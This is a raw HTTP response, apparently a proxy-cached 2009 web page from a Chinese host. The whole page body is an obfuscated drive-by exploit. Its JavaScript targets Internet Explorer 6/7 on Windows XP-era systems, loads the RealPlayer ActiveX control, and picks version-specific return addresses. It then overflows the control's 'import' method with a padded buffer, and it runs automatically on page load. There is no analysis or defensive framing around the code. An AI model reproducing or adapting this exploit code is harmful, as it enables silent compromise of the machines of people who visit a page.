HTTP/1.1 200 OK
Content-Length: 2351
ETag: "2a834954189ac91:299"
Date: Thu, 12 Mar 2009 07:32:00 GMT
Last-Modified: Sun, 01 Mar 2009 02:49:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/real10.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:40:00 GMT
X-Polipo-Access: Thu, 12 Mar 2009 07:40:00 GMT

<script src="real.js"></script>
<script language="JavaScript">var lalsxv="q";
var addr=["%75%06"+"%74"+"%04","%7f"+"%a5%60","%4f"+"%71"+"%a4"+"%60","%63"+"%11"+"%08"+"%60","%63%11"+"%04"+"%60","%79"+"%31"+"%01"+"%60","%79"+"%31"+"%09"+"%60","%51"+"%11"+"%70"+"%63"];
function mybr(myco,arr1){
	var user=navigator.userAgent["toLowerCase"]();
	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return ;
	if(user.indexOf("nt 5.")==-1)return ;
	var Gamttt;
	RealplayerObj="IaaaEaaaR"+"PaaaCaaataaal.I"+"EaaaRaaaP"+"Caaataaal.1";
	Gamttt=RealplayerObj;
	try{
		Gamttt_Anhey_Real_Exp_Send=new window["ActiveXObject"](RealplayerObj["replace"](/a/g,""))
	}catch(error){
		return 
	}
	CuteRealVersion="PRODUCT";
	CuteRealVersion2="VERSION";
	CuteRealVersion3s="chilam";
	dddd="6.0.14.544";
	CuteRealVersions=CuteRealVersion+CuteRealVersion2;
	RealVersion=Gamttt_Anhey_Real_Exp_Send["PlayerProperty"](CuteRealVersions);
	sdfdgdfg="";
	cvbcbb=unescape(addr[0]);
	for(i=0;i<32*148;i++)sdfdgdfg+="S";if(RealVersion.indexOf("6.0.14.")==-1){
		if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape(addr[1]);
		else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape(addr[2]);
		else return 
	}else if(RealVersion==dddd)ret=unescape(addr[3]);
	else if(RealVersion=="6.0.14.550")ret=unescape(addr[4]);
	else if(RealVersion=="6.0.14.552")ret=unescape(addr[5]);
	else if(RealVersion=="6.0.14.543")ret=unescape(addr[6]);
	else if(RealVersion=="6.0.14.536")ret=unescape(addr[7]);
	else return ;
	if(RealVersion.indexOf("6.0.10.")!=-1){
		for(i=0;i<4;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret
	}else if(RealVersion.indexOf("6.0.11.")!=-1){
		for(i=0;i<6;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret
	}else if(RealVersion.indexOf("6.0.12.")!=-1){var dadong="mybr";
		for(i=0;i<9;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret
	}else if(RealVersion.indexOf("6.0.14.")!=-1){
		for(i=0;i<10;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret;var opdpdd="v";
	}var Ball,Qqs="Fucking AntiVirus";
qwfgsg="LLLL\\XXXX"+"XLD";
Ball=Qqs;
C2="";
xcbfcxn=sdfdgdfg+qwfgsg+myco;
var fucpp="d";
temp=0x8000;
while(xcbfcxn.length<temp)xcbfcxn+="lizhen";
Gamttt_Anhey_Real_Exp_Send["import"](arr1[Math.floor(Math["random"]()*6)],xcbfcxn,"123456456",0,0)
}mybr(myco,arr1);var hsfn="d";
</script>